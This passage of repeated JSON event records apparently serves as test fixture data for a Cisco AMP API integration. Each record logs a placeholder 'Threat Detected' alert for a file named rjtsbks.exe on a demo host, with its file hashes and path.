Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163590","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163589","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":426000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163588","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163587","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":410000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163586","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":395000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163585","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":317000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":208000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163578","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163577","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":192000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163576","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163575","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":145000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163574","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163573","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163572","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":130000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163571","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163570","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":114000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163569","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 